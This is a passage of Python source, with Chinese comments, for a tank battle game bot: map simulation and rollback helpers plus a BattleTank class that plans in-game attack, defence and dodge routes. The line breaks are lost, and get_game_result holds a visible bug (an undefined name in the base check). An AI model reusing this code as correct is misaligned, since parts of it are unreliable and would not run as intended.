action) #debug_print("simulate:", tank, action) #self._revertIdx += 1 #self._revertStack.append( (self._revertIdx, tank, action) ) yield except Exception as e: raise e finally: self.revert() # 不管出于什么错误,模拟结束后必定回滚 #self._revertStack.pop() #debug_print("revert:", tank, action) @contextmanager def simulate_multi_actions(self, *actions): """ multi_simulate 的 with 用法 """ try: self.multi_simulate(*actions) yield except Exception as e: raise e finally: self.revert() @contextmanager def rollback_to_previous(self): """ 回滚到先前回合 回滚结束后,会自动撤销回滚 """ try: success = self.revert() yield except Exception as e: raise e finally: if success: self.undo_revert() # 回合结束后撤销回滚 @contextmanager def auto_revert(self): """ 自动实现多轮回滚 可以在 yield 后连续不定次调用 single_simulate/multi_simulate 函数, 模拟结束后自动调用 counter 次 revert 来自动多轮回滚 yield 后可以通过调用 cnt.increase 来增加回滚次数 """ try: cnt = self.__class__._Counter() yield cnt # 每成功调用一次 map_.simulate 就需要调用一次 increase except Exception as e: raise finally: for _ in cnt: self.revert() @contextmanager def auto_undo_revert(self): """ 同上,但会在结束时通过调用 counter 次 undo_revert 来实现多轮 revert 操作的回滚 """ try: cnt = self.__class__._Counter() yield cnt # 每成功调用一次 map_.revert 就需要调用一次 increase except Exception as e: raise finally: for _ in cnt: self.undo_revert() def get_game_result(self): """ 判断胜利方 Return: - result int 比赛结果 > GAME_STATUS_NOT_OVER 比赛尚未结束 > GAME_STATUS_DRAW 平局 > GAME_STATUS_BLUE_WIN 蓝方获胜 > GAME_STATUS_RED_WIN 红方获胜 """ failed = [ False for _ in range(SIDE_COUNT) ] # 0 蓝方 1 红方 for side in range(SIDE_COUNT): # 坦克全部被消灭 tanks = self._tanks[side] if all(tank.destroyed for tank in tanks): failed[side] = True # 基地被摧毁 baes = self._bases[base] if base.destroyed: failed[side] = True if failed[0] and failed[1]: return GAME_STATUS_DRAW elif not failed[0] and failed[1]: return GAME_STATUS_BLUE_WIN elif failed[0] and not failed[1]: return GAME_STATUS_RED_WIN else: return GAME_STATUS_NOT_OVER def debug_print_out(self, compact=COMPACT_MAP): """ [DEBUG] 输出整个地图 Input: - compact bool 是否以紧凑的形式输出 
""" if not DEBUG_MODE: return EMPTY_SYMBOL = " " BASE_SYMBOL = "基" BRICK_SYMBOL = "土" STEEL_SYMBOL = "钢" WATER_SYMBOL = "水" BLUE_TANK_SYMBOL = "蓝" RED_TANK_SYMBOL = "红" MULTI_TANK_SYMBOL = "重" UNEXPECTED_SYMBOL = "?" SPACE = " " if not compact else "" _TEXT_WIDTH = (self._width * 2 - 1) if not compact else self._width CUT_OFF_RULE = "=" * _TEXT_WIDTH print_inline = functools.partial(print, end=SPACE) print("\n%s" % CUT_OFF_RULE) if not compact: print("") for y in range(self._height): for x in range(self._width): fields = self._content[y][x] if len(fields) == 0: print_inline(EMPTY_SYMBOL) elif len(fields) > 1: print_inline(MULTI_TANK_SYMBOL) elif len(fields) == 1: field = fields[0] if isinstance(field, EmptyField): print_inline(EMPTY_SYMBOL) elif isinstance(field, BaseField): print_inline(BASE_SYMBOL) elif isinstance(field, BrickField): print_inline(BRICK_SYMBOL) elif isinstance(field, SteelField): print_inline(STEEL_SYMBOL) elif isinstance(field, WaterField): print_inline(WATER_SYMBOL) elif isinstance(field, TankField): tank = field if tank.side == 0: print_inline(BLUE_TANK_SYMBOL) elif tank.side == 1: print_inline(RED_TANK_SYMBOL) else: print_inline(UNEXPECTED_SYMBOL) else: print_inline(UNEXPECTED_SYMBOL) else: print_inline(UNEXPECTED_SYMBOL) print("\n" if not compact else "") print("%s\n" % CUT_OFF_RULE) #{ END 'map_.py' }# #{ BEGIN 'tank.py' }# class BattleTank(object): _instances = {} # { (side, id): instance } def __new__(cls, tank, map=None, **kwargs): """ 以 (side, id) 为主键,缓存已经创建过的作战对象 使得该对象对于特定的 tank 对象为 Singleton """ key = (tank.side, tank.id) obj = __class__._instances.get(key) if obj is None: map_ = map if map_ is None: raise ValueError("map is required at first initialization") obj = object.__new__(cls, **kwargs) __class__._instances[key] = obj obj._initialize(tank, map_) # 用自定义的函数初始化,而不是 __init__ ,为了防止单例被反复调用 return obj def __init__(self, tank, map=None): pass def _initialize(self, tank, map): self._tank = tank self._map = map #self.__attackingRoute = 
None # 缓存变量 -> 为了支持地图回滚,将路线缓存暂时去掉了 def __eq__(self, other): return self.side == other.side and self.id == other.id def __repr__(self): return "%s(%d, %d, %d, %d)" % ( self.__class__.__name__, self.x, self.y, self.side, self.id) def __copy__(self): return self def __deepcopy__(self): # singleton ! return self @property def field(self): return self._tank @property def tank(self): return self._tank @property def side(self): return self._tank.side @property def id(self): return self._tank.id @property def x(self): return self._tank.x @property def y(self): return self._tank.y @property def xy(self): return self._tank.xy @property def destroyed(self): return self._tank.destroyed @property def canShoot(self): # 本回合是否可以射击 return not Action.is_shoot(self._tank.previousAction) def is_this_field_in_our_site(self, field, include_midline=False): """ 判断某个 field 是否位于我方半边地盘 Input: - field Field - include_midline bool 是否包含分界线 """ base = self._map.bases[self.side] if include_midline: return ( np.abs( field.y - base.y ) <= 4 ) else: return ( np.abs( field.y - base.y ) < 4 ) def is_this_field_in_enemy_site(self, field, include_midline=False): # 默认不包含中线 """ 是否处于敌方半边的地图 """ return not self.is_this_field_in_our_site(field, include_midline= not include_midline) def is_in_our_site(self, include_midline=False): """ 是否处于我方半边的地图 Input: - include_midline bool 是否包含分界线 """ return self.is_this_field_in_our_site(self.tank, include_midline=include_midline) def is_in_enemy_site(self, include_midline=True): """ 是否处于地方半边的地图 """ return self.is_this_field_in_enemy_site(self.tank, include_midline=include_midline) def is_near_midline(self, offset=1): """ 是否在中线附近 Input: - offset int 定义中线范围为 4 ± offset 的范围 例如 offset = 1 则 [3, 5] 均为中线范围 """ return ( np.abs( self.y - 4 ) <= offset ) def get_surrounding_empty_field_points(self, **kwargs): """ 获得周围可以移动到达的空位 """ tank = self._tank map_ = self._map x, y = tank.xy points = [] for dx, dy in get_searching_directions(x, y, **kwargs): x3 = x + dx y3 = y + dy if not 
map_.in_map(x3, y3): continue fields = map_[x3, y3] if len(fields) == 0: points.append( (x3, y3) ) elif len(fields) > 2: continue else: field = fields[0] if isinstance(field, EmptyField): points.append( (x3, y3) ) else: continue return points def get_all_valid_move_actions(self, **kwargs): """ 所有合法的移动行为 """ tank = self._tank map_ = self._map actions = [] x1, y1 = tank.xy for x2, y2 in self.get_surrounding_empty_field_points(**kwargs): moveAction = Action.get_move_action(x1, y1, x2, y2) map_.is_valid_move_action(tank, moveAction) actions.append(moveAction) return actions def get_all_valid_shoot_actions(self): """ 获得所有合法的射击行为 """ if self.canShoot: return list(Action.SHOOT_ACTIONS) else: return [] def get_all_valid_actions(self): """ 获得所有合法的行为 """ return self.get_all_valid_move_actions() + self.get_all_valid_shoot_actions() + [ Action.STAY ] def get_all_shortest_attacking_routes(self, ignore_enemies=True, bypass_enemies=False, delay=0, **kwargs): """ 获得所有最短的进攻路线 -------------------------- Input: - ignore_enemies bool 是否将敌人视为空 - bypass_enemies bool 是否将敌人视为 SteelField 然后尝试绕过他0 - delay int 允许与最短路线延迟几步 WARNING: ignore_enemies 与 bypass_enemies 为互斥选项,至多选择一个 Yield From: - routes [Route] """ if ignore_enemies and bypass_enemies: raise ValueError("you can't think of enemies as steel and air at the same time") map_ = self._map tank = self._tank side = tank.side oppSide = 1- tank.side oppBase = map_.bases[oppSide] if ignore_enemies: matrix_T = fake_map_matrix_T_without_enemy(map_, tank.side) elif bypass_enemies: matrix_T = fake_map_matrix_T_thinking_of_enemy_as_steel(map_, tank.side) else: matrix_T = map_.matrix_T kwargs.setdefault("middle_first", False) # 优先边路搜索 routes = find_all_routes_for_shoot( tank.xy, oppBase.xy, matrix_T, block_types=DEFAULT_BLOCK_TYPES+( Field.BASE + 1 + side, Field.TANK + 1 + side, # 队友有可能会变成阻碍! 
5cdde41fd2337e01c79f1284 Field.MULTI_TANK, ), destroyable_types=DEFAULT_DESTROYABLE_TYPES+( Field.BASE + 1 + oppSide, # 不将敌方坦克加入到其中 ), **kwargs) minLength = INFINITY_ROUTE_LENGTH for route in routes: if not route.is_not_found(): if minLength == INFINITY_ROUTE_LENGTH: minLength = route.length # 初始化 minLength if route.length - minLength > delay: break yield route else: # 否则就是 [ Route() ] 表示没有找到路径 yield route break def get_shortest_attacking_route(self, *args, **kwargs): """ 获得默认的最短攻击路径 """ for route in self.get_all_shortest_attacking_routes(*args, **kwargs): return route # 直接返回第一个 route def get_next_attacking_action(self, route=None): """ 下一个进攻行为,不考虑四周的敌人 Input: - route Route 自定义的攻击路径 默认为 None ,使用默认的最短路径 """ tank = self._tank map_ = self._map oppBase = map_.bases[1 - tank.side] battler = self if route is None: route = battler.get_shortest_attacking_route() if route.is_not_found(): # 没有找到路线,这种情况不可能 return Action.STAY elif route.length == 0: # 说明 start 和 end 相同,已经到达基地,这种情况也不可能 return Action.STAY x1, y1 = tank.xy x3, y3 = route[1].xy # 跳过 start action = Action.get_action(x1, y1, x3, y3) # move-action dx, dy = Action.DIRECTION_OF_ACTION_XY[action] ## 优先移动 ## if map_.is_valid_move_action(tank, action): # 但是,如果正前方就是基地,则不移动,只射击 x, y = tank.xy while True: x += dx y += dy if not map_.in_map(x, y): break fields = map_[x, y] if len(fields) == 0: continue elif len(fields) > 1: break else: field = fields[0] if isinstance(field, (WaterField, EmptyField) ): continue elif isinstance(field, SteelField): break # 钢墙不可以射穿 elif isinstance(field, BrickField): # 土墙认为可以射掉 continue elif isinstance(field, TankField): # 坦克也认为可以射掉 if field.side == tank.side: break # 队友坦克不进攻 continue # 敌方坦克在此处不应该出现,他们应该在上游的决策中被考虑到 elif field is oppBase: if battler.canShoot: # 这个时候如果能够射击,就优先射击 return action + 4 else: continue # 其他情况仍然优先移动 return action ## 遇到墙/敌方基地/坦克,不能移动 if battler.canShoot: # 尝试射击 action += 4 for field in battler.get_destroyed_fields_if_shoot(action): if isinstance(field, TankField) and 
field.side == tank.side: return Action.STAY # 仅需要防止射到队友 return action # 不能射击,只好等待 return Action.STAY def get_all_next_attacking_actions(self, routes=None): """ 返回所有给定路线的下一回合行为的并集 Input: - route [Route]/None Return: - actions [int] """ if routes is None: routes = self.get_all_shortest_attacking_routes() # 默认用所有最短的进攻路线 return list(set( self.get_next_attacking_action(route) for route in routes )) def get_all_shortest_defensive_routes(self, delay=0, **kwargs): """ 获得所有的回防路线 ---------------- 同 get_all_shortest_attacking_routes """ map_ = self._map tank = self._tank side = tank.side base = map_.bases[side] matrix_T = map_.matrix_T kwargs.setdefault("middle_first", True) routes = find_all_routes_for_move( tank.xy, base.xy, matrix_T, **kwargs, ) minLength = INFINITY_ROUTE_LENGTH for route in routes: if not route.is_not_found(): if minLength == INFINITY_ROUTE_LENGTH: minLength = route.length # 初始化 minLength if route.length - minLength > delay: break yield route else: # 否则就是 [ Route() ] 表示没有找到路径 yield route break def get_shortest_defensive_route(self, *args, **kwargs): """ 获取默认的最短路线 """ for route in self.get_all_shortest_defensive_routes(*args, **kwargs): return route # 直接返回第一个 def get_next_defensive_action(self, route=None): """ 获得下一个防御动作,不考虑周围敌人 """ tank = self._tank map_ = self._map base = map_.bases[tank.side] if route is None: route = self.get_shortest_defensive_route() if route.is_not_found(): return Action.STAY elif route.length == 0: return Action.STAY x1, y1 = tank.xy x3, y3 = route[1].xy # 跳过 start action = Action.get_action(x1, y1, x3, y3) # move-action dx, dy = Action.DIRECTION_OF_ACTION_XY[action] ## 优先移动 ## if map_.is_valid_move_action(tank, action): return action ## 遇到墙/己方基地/坦克,不能移动 if self.canShoot: # 尝试射击 action += 4 for field in self.get_destroyed_fields_if_shoot(action): if isinstance(field, TankField) and field.side == tank.side: return Action.STAY # 仅需要防止射到队友 elif isinstance(field, BaseField) and field is base: return Action.STAY # 遇到己方基地 return action # 
否则就是等待了 return Action.STAY def get_shortest_route_to_enemy(self, oppTank): """ 查找射杀敌方的最短路线 TODO: 可能需要判断水路 尚没有被使用过 """ tank = self._tank map_ = self._map side = tank.side oppSide = 1 - side route = find_shortest_route_for_shoot( tank.xy, oppTank.xy, map_.matrix_T, # 正常地图 block_types=DEFAULT_BLOCK_TYPES+( Field.BASE + 1 + side, Field.TANK + 1 + side, Field.MULTI_TANK, ), destroyable_types=DEFAULT_DESTROYABLE_TYPES+( Field.BASE + 1 + oppSide, Field.TANK + 1 + oppSide, # 加入地方坦克 ), x_axis_first=True, # 优先左右拦截 ) return route def get_route_to_enemy_by_move(self, oppTank, block_teammate=True, **kwargs): """ 近身条件下,获得到达对方的路劲 """ tank = self._tank map_ = self._map side = tank.side if block_teammate: # 将己方坦克和重叠坦克视为 block block_types = DEFAULT_BLOCK_TYPES+( Field.BASE + 1 + side, Field.TANK + 1 + side, Field.MULTI_TANK, ) else: block_types = DEFAULT_BLOCK_TYPES+( Field.BASE + 1 + side, ) # 优先左右拦截 kwargs.setdefault("middle_first", True) kwargs.setdefault("x_axis_first", True) route = find_shortest_route_for_move( tank.xy, oppTank.xy, map_.matrix_T, block_types=block_types, **kwargs, ) return route def get_route_to_point_by_move(self, x2, y2, **kwargs): """ 这个函数仅限于在基地中获得用来移动到两个 guard point 的最短路径 !s """ tank = self._tank map_ = self._map side = tank.side # 优先左右移动 kwargs.setdefault("middle_first", True) kwargs.setdefault("x_axis_first", True) route = find_shortest_route_for_move( tank.xy, (x2, y2), map_.matrix_T, block_types=DEFAULT_BLOCK_TYPES+( Field.BASE + 1 + side, ), **kwargs, ) return route def get_route_to_field_by_move(self, field, **kwargs): """ 上一个函数的一个简单扩展 """ x2, y2 = field.xy return self.get_route_to_point_by_move(x2, y2, **kwargs) def get_next_hunting_action(self, oppTank): """ 下一个追杀敌军的行为 """ tank = self._tank map_ = self._map side = tank.side oppSide = 1 - side route = self.get_shortest_route_to_enemy(oppTank) if route.is_not_found(): # 没有找到路线,这种情况不可能 return Action.STAY elif route.length == 0: # 说明自己和敌方重合,这种情况不应该出现 return Action.STAY x1, y1 = tank.xy x3, y3 = 
route[1].xy # 跳过 start action = Action.get_action(x1, y1, x3, y3) # move-action dx, dy = Action.DIRECTION_OF_ACTION_XY[action] ## 见到敌人就开火,否则移动 shootAction = action + 4 destroyedFields = [] # 会被用到两次,因此缓存一下 if self.canShoot: destroyedFields = self.get_destroyed_fields_if_shoot(action) for field in destroyedFields: if isinstance(field, TankField) and field.side == side: # 有队友,停止射击 break else: # 否则再判断是否应该射击 for field in destroyedFields: if isinstance(field, TankField) and field.side == oppSide: return shootAction # 到此处说明没有敌人,或者有队友 ## 优先移动 if map_.is_valid_move_action(tank, action): return action ## 遇到路障,射击 if self.canShoot: for field in destroyedFields: if isinstance(field, TankField) and field.side == side: return Action.STAY # 遇到队友,等待 return shootAction ## 也不能射击?于是等待 return Action.STAY def get_manhattan_distance_to(self, field): """ 获得自身到 field 的曼哈顿距离,不考虑中间地形 通常用于判断 field 与自身距离是否为 2 ,也就是中间相隔一个格子 Input: - field Field/BattleTank/... 具有 xy, x, y 属性的 field 对象 """ x1, y1 = self.xy x2, y2 = field.xy return get_manhattan_distance(x1, y1, x2, y2) def get_manhattan_distance_to_point(self, x2, y2): """ 对上一函数的补充,允许传入 xy 作为变量 """ x1, y1 = self.xy return get_manhattan_distance(x1, y1, x2, y2) def get_enemies_around(self): """ 返回获得身边的 tank 可能有多架 WARNING: 这个函数可以返回空值,也就是没有任何敌人在身旁的时候也可以使用 如果需要知道 enemies 是谁,那么建议直接调用这个函数来确定身边情况 Return: - tanks [TankField]/[] """ tank = self._tank map_ = self._map x1, y1 = tank.xy enemies = [] for dx, dy in get_searching_directions(x1, y1): x, y = tank.xy while True: x += dx y += dy if not map_.in_map(x, y): break currentFields = map_[x, y] if len(currentFields) == 0: # 没有对象 continue elif len(currentFields) > 1: # 多辆坦克 for field in currentFields: if isinstance(field, TankField) and field.side != tank.side: enemies.append(field) else: # len == 1 field = currentFields[0] if isinstance(field, (EmptyField, WaterField) ): continue elif not isinstance(field, TankField): # 说明这个方向上没有敌人 break elif field.side != tank.side: # 遇到了敌人 enemies.append(field) else: # 
遇到了队友 break return enemies def has_enemy_around(self): """ 周围是否存在敌军 """ return len(self.get_enemies_around()) > 0 def has_overlapping_enemy(self): """ 是否与敌方坦克重合 """ map_ = self._map tank = self._tank onSiteFields = map_[tank.xy] for field in onSiteFields: assert isinstance(field, TankField), "unexpected field %r" % field if field.side != tank.side: return True return False def get_overlapping_enemy(self): """ 获得与自身重叠的坦克 认为一般只与一架坦克重合,所以返回遇到的第一辆坦克 WARNING: - 这个函数调用前,必须先检查是否有重叠的敌人 Return: - tank TankField """ map_ = self._map tank = self._tank onSiteFields = map_[tank.xy] for field in onSiteFields: if field.side != tank.side: return field raise Exception("no overlapping enemy was found") def try_dodge(self, oppTank): """ 尝试回避对方 tank Input: - oppTank TankField/BattleTank 能够通过 x, y, xy 获取坐标值的坦克对象 Return: - actions [int] 能够闪避开的行为值,可能为空 """ tank = self._tank map_ = self._map side = tank.side base = map_.bases[side] oppBase = map_.bases[1- side] teammate = map_.tanks[side][1 - tank.id] battler = self x1, y1 = tank.xy x2, y2 = oppTank.xy if battler.is_in_our_site(): x3, y3 = base.xy # 在本方地盘,优先朝自己基地的方向闪现 else: x3, y3 = oppBase.xy # 在对方地盘,优先朝着对方基地的方向闪现 actions = [] for dx, dy in get_searching_directions(x1, y1, x3, y3, middle_first=True): # 优先逃跑向对方基地 x4 = x1 + dx y4 = y1 + dy if x4 == x2 or y4 == y2: # 逃跑方向不对 continue action = Action.get_action(x1, y1, x4, y4) if map_.is_valid_move_action(tank, action): actions.append(action) # # 应该朝着远离队友的方向闪避? 
5ce915add2337e01c7abd895 # # 因为 BUG ,这个功能尚未实现 5ce9ce0cd2337e01c7acfd5c # # # 我决定不删掉这里的任何一条 DEBUG 注释来纪念这个花了 5 个小时都没有搞懂的 BUG # 没有错,把下面这段全部注释掉,这个程序就一点 BUG 都没有了 # '''def _cmp(action): #debug_print("Inner: ", id(map_), id(battler), id(teammate), id(action), action) #map_.debug_print_out() with map_.simulate_one_action(tank, action): #map_.debug_print_out() return battler.get_manhattan_distance_to(teammate)''' #debug_print("Before:", id(map_), id(battler), id(teammate), id(action), action) #map_.debug_print_out() #debug_print(teammate.previousAction) '''if battler.on_the_same_line_with(teammate): # 仅仅在处于同一行时成立 #debug_print(actions) actions.sort(key=lambda action: _cmp(action), reverse=True) #debug_print(actions)''' #debug_print(teammate.previousAction, "\n") # 因为一些奇怪的原因,地图没有正确回滚!! #map_.debug_print_out() #debug_print("After: ", id(map_), id(battler), id(teammate), id(action), action) #debug_print("") ### END BUG ### return actions def can_dodge(self): """ 当前地形是否拥有闪避的机会,用于判断是否处在狭路,与 len( try_dodge ) > 0 不等价 """ tank = self._tank map_ = self._map x, y = self._tank.xy actions = [] for dx, dy in get_searching_directions(x, y): x3 = x + dx y3 = y + dy moveAction = Action.get_action(x, y, x3, y3) if map_.is_valid_move_action(moveAction): actions.append(moveAction) if len(actions) < 2: # 不可能闪避 return False if len(actions) >= 3: # 可以 return True assert len(actions) == 2 return not Action.is_opposite(*actions) # 相反方向,无法闪避,否则可以 def break_brick_for_dodge(self, oppTank): """ 尝试凿开两边墙壁,以闪避敌人进攻 适用条件: 自己处在 WAIT_FOR_MARCHING 状态,身边没有遇敌的时候 """ tank = self._tank map_ = self._map side = tank.side oppSide = 1 - side base = map_.bases[side] oppBase = map_.bases[oppSide] x1, y1 = tank.xy x2, y2 = oppTank.xy if self.is_in_our_site(): # 选择性同 try_dodge x3, y3 = base.xy else: x3, y3 = oppBase.xy actions = [] for dx, dy in get_searching_directions(x1, y1, x3, y3, middle_first=True): # 按照惯例,优先凿开移向对方基地的墙 x3 = x1 + dx y3 = y1 + dy if x3 == x2 or y3 == y2: # 方向不对,不能凿开相隔的墙 continue # 需要判断两边的墙壁是否为不可凿开的对象 
if not map_.in_map(x3, y3): continue fields = map_[x3, y3] assert len(fields) == 1, "not suit for current situation" field = fields[0] if isinstance(field, BrickField): action = Action.get_action(x1, y1, x3, y3) + 4 # 射击行为一定成功 actions.append(action) else: # 其他都是不适用的 continue return actions def move_to(self, oppTank): """ 返回 self -> oppTank 的移动 Input: oppTank TankField/BattleTank 所有带坐标的 tank 对象 """ x1, y1 = self._tank.xy x2, y2 = oppTank.xy assert x1 == x2 or y1 == y2, "can't be used when two tanks are not in line" return Action.get_action(x1, y1, x2, y2) def shoot_to(self, oppTank): """ 返回 self -> oppTank 的射击行为,相当于 move + 4 """ return self.move_to(oppTank) + 4 def on_the_same_line_with(self, field, ignore_brick=True): """ 是否和某个块处在同一条直线上 Input: field 任何带坐标的 tank 对象 ignore_brick bool 是否忽略土墙的阻挡 """ tank = self._tank map_ = self._map x1, y1 = tank.xy x2, y2 = field.xy if x1 != x2 and y1 != y2: # 坐标上直接可以否掉的情况 return False elif (x1, y1) == (x2, y2): # 重叠,这种情况一般不会出现,但是还是判断一下 return True if x1 == x2: dx = 0 dy = np.sign(y2 - y1) elif y1 == y2: dx = np.sign(x2 - x1) dy = 0 x, y = tank.xy while True: x += dx y += dy if not map_.in_map(x, y): break _fields = map_[x, y] if len(_fields) == 0: continue elif len(_fields) == 2: if field.xy == (x, y): # 说明处在在多人坦克里 return True else: # 否则不算 return False else: _field = _fields[0] if _field.xy == field.xy: # 和这个块坐标相同(注意不要用 is 来判断,因为传入的可能是 BattleTank) return True elif isinstance(_field, (EmptyField, WaterField) ): continue elif isinstance(_field, BrickField): if ignore_brick: # 这种情况将 brick 视为空 continue else: return False else: return False # 其他所有的 block 类型均视为 False # 没有检查到受阻的情况,那么就是在同一条直线上了 return True def back_away_from(self, oppTank): """ 背向远离地方坦克 """ return (self.move_to(oppTank) + 2) % 4 # 获得相反方向 def get_destroyed_fields_if_shoot(self, action): """ 如果向 action 对应的方向射击,那么可以摧毁什么东西? 
------------------------------------------------------------ 主要用于 move 不安全而又不想白白等待的情况,尝试采用进攻开路 也可以用于其他问题的判断 Input: - action int 原始的移动行为(虽然事实上也可以是射击 :) Return: - fields [Field] 将被摧毁的对象 """ assert Action.is_move(action) or Action.is_shoot(action) tank = self._tank map_ = self._map action %= 4 x, y = tank.xy dx, dy = Action.DIRECTION_OF_ACTION_XY[action] while True: x += dx y += dy if not map_.in_map(x, y): break fields = map_[x, y] if len(fields) == 0: # 没有对象 continue elif len(fields) > 1: # 多辆坦克 return fields else: field = fields[0] if isinstance(field, (WaterField, EmptyField) ): continue elif isinstance(field, SteelField): return [] else: return fields return [] def will_destroy_a_brick_if_shoot(self, action): """ 如果当前回合射击,是否能够摧毁一个墙 """ destroyedFields = self.get_destroyed_fields_if_shoot(action) if len(destroyedFields) == 1: field = destroyedFields[0] if isinstance(field, BrickField): return True return False def is_face_to_enemy_base(self, ignore_brick=False): """ 是否直面对方基地,或者是与敌人基地处在同一条直线上 (一个历史遗留接口) Input: - ignore_brick bool 是否忽略土墙,如果忽略,那么只需要基地和坦克 处在同一直线上即可 """ oppBase = self._map.bases[1 - self.side] return self.on_the_same_line_with(oppBase, ignore_brick=ignore_brick) def is_closest_to(self, field, allow_diagonal=True): """ 是否紧贴某个 field 也就是与之相邻或恰为对角 Input: - field Field 事实上只要带有 xy 属性的类都可以 - allow_diagonal bool 是否将对角线关系也算入 """ x1, y1 = self.xy x2, y2 = field.xy isInnermost = ( np.abs(x1 - x2) <= 1 and np.abs(y1 - y2) <= 1 ) if allow_diagonal: return isInnermost else: return isInnermost and (x1 == x2 or y1 == y2) # 还需要共线 def get_enemy_behind_brick(self, action, interval=0): """ 返回行为对应的方向后的围墙后的敌人 乙方坦克和围墙间可以有任意空位 围墙到敌方坦克间至多有 interval 个空位 Input: - action int 移动/射击行为,确定方向 - interval int 最远检查到距离墙多远的位置? 
interval = 0 表示只检查最靠近墙的那个位置 特殊地 interval = -1 表示不限制 interval Return: - tank TankField/None 敌人对应的 tank 对象,多个敌人只返回一个 情况不符则返回 None """ tank = self._tank map_ = self._map x1, y1 = tank.xy dx, dy = Action.DIRECTION_OF_ACTION_XY[action % 4] # 检查前方是否是墙 x2, y2 = x1, y1 while True: x2 += dx y2 += dy if not map_.in_map(x2, y2): return None fields = map_[x2, y2] if len(fields) == 0: continue elif len(fields) > 1: return None else: field = fields[0] if isinstance(field, BrickField): break # 此时 x2, y2 位置上是一个 Brick elif isinstance(field, (WaterField, EmptyField) ): continue else: return None # 检查前方是否有敌方坦克 x3, y3 = x2, y2 currentInterval = -1 while True: currentInterval += 1 if interval != -1 and currentInterval > interval: break x3 += dx y3 += dy if not map_.in_map(x3, y3): break fields = map_[x3, y3] if len(fields) == 0: continue elif len(fields) > 1: for field in fields: if isinstance(field, TankField) and field.side != tank.side: return field else: field = fields[0] if isinstance(field, TankField) and field.side != tank.side: return field elif isinstance(field, (WaterField, EmptyField) ): continue else: # 除了水路和空地可以继续搜索外,其他情况均直接结束 break return None def has_enemy_behind_brick(self, action): return self.get_enemy_behind_brick(action) is not None def get_nearest_enemy(self): #, block_teammate=False, isolate=False): """ 获得最近的敌人,移动距离 Input: - isolate bool 是否只考虑离自己最近,而不从团队整体考虑 如果联系整个团队,那么离自己最近的敌人定义为与我之间间隔的步数 和与我的队友之间间隔的步数差最小的敌人 Return: - enemy TankField """ '''tank = self._tank map_ = self._map _enemies = map_.tanks[1 - tank.side] enemies = [ enemy for enemy in _enemies if not enemy.destroyed ] # 已经被摧毁的敌人就不考虑了 if len(enemies) == 0: # 胜利? return None if len(enemies) < 2: return enemies[0] # TODO: # 两种情况的决策顺序是有差别的,一个是见到走不通就 block_teammate = False 另一个是如果全部都走不通 # 就全部 block_teammate = False ,这可能会引发问题? 
if not isolate: # # 注:这是一个糟糕的设计,因为 BattleTank 对象最初被设计为只懂得单人决策的对象 # 他不应该知道队友的行为,但是此处打破了这个规则 # teammate = BattleTank( map_.tanks[tank.side][ 1 - tank.id ] ) if teammateBattler.destroyed: pass else: deltaLengthWithEnemyList = [] for enemy in enemies: route1 = self.get_route_to_enemy_by_move(enemy) if route1.is_not_found(): route1 = self.get_route_to_enemy_by_move(enemy, block_teammate=False) if route1.is_not_found(): # 我无法到达敌人的位置??? continue route2 = teammateBattler.get_route_to_enemy_by_move(enemy) if route2.is_not_found(): route2 = teammateBattler.get_route_to_enemy_by_move(enemy, block_teammate=False) if route2.is_not_found(): deltaLength = route1.length # 这样做是否合理? else: deltaLength = route1.length - route2.length deltaLengthWithEnemyList.append( (deltaLength, enemy) ) idx = deltaLengthWithEnemyList.index( min(deltaLengthWithEnemyList, key=lambda tup: tup[0]) ) return deltaLengthWithEnemyList[idx][1] # 否则为单人决策 routes = [ self.get_route_to_enemy_by_move(enemy) for enemy in enemies ] if all( route.is_not_found() for route in routes ): # 均不可到达? routes = [ self.get_route_to_enemy_by_move(enemy, block_teammate=False) for enemy in enemies ] # 因为队友阻塞 ? 
routeWithEnemyList = [ (route, enemy) for route, enemy in zip(routes, enemies) if not route.is_not_found() # 队友阻塞导致 -1 需要去掉 ] idx = routeWithEnemyList.index( min(routeWithEnemyList, key=lambda tup: tup[0].length) ) return routeWithEnemyList[idx][1]''' tank = self._tank map_ = self._map enemies = [ enemy for enemy in map_.tanks[1 - tank.side] if not enemy.destroyed ] # 已经被摧毁的敌人就不考虑了 battler = self teammate = BattleTank( map_.tanks[tank.side][ 1 - tank.id ] ) if not teammate.destroyed: return min( enemies, key=lambda enemy: battler.get_manhattan_distance_to(enemy) - teammate.get_manhattan_distance_to(enemy) ) # 综合队友的情况进行考虑,对方离我近,同时离队友远,那么那么更接近于我 else: return min( enemies, key=lambda enemy: battler.get_manhattan_distance_to(enemy) ) def check_is_outer_wall_of_enemy_base(self, field, layer=2): """ 检查一个 field 是否为敌方基地的外墙 外墙被视为基地外的 layer 层 Brick """ if not isinstance(field, BrickField): return False map_ = self._map tank = self._tank oppBase = map_.bases[1 - tank.side] x1, y1 = oppBase.xy x2, y2 = field.xy return ( np.abs( x1 - x2 ) <= layer and np.abs( y1 - y2 ) <= layer ) def get_enemy_delay_if_bypass_me(self, oppBattler): """ 假设自己不移动,敌人必须要饶过我,那么他将因此延迟多少步 """ route1 = oppBattler.get_shortest_attacking_route(ignore_enemies=True, bypass_enemies=False) route2 = oppBattler.get_shortest_attacking_route(ignore_enemies=False, bypass_enemies=True) if route1.is_not_found(): # TODO: 如何处理本来就找不到路的情况? return INFINITY_ROUTE_LENGTH if route2.is_not_found(): return INFINITY_ROUTE_LENGTH delay = route2.length - route1.length assert delay >= 0 # 显然必定会大于 0 ! 
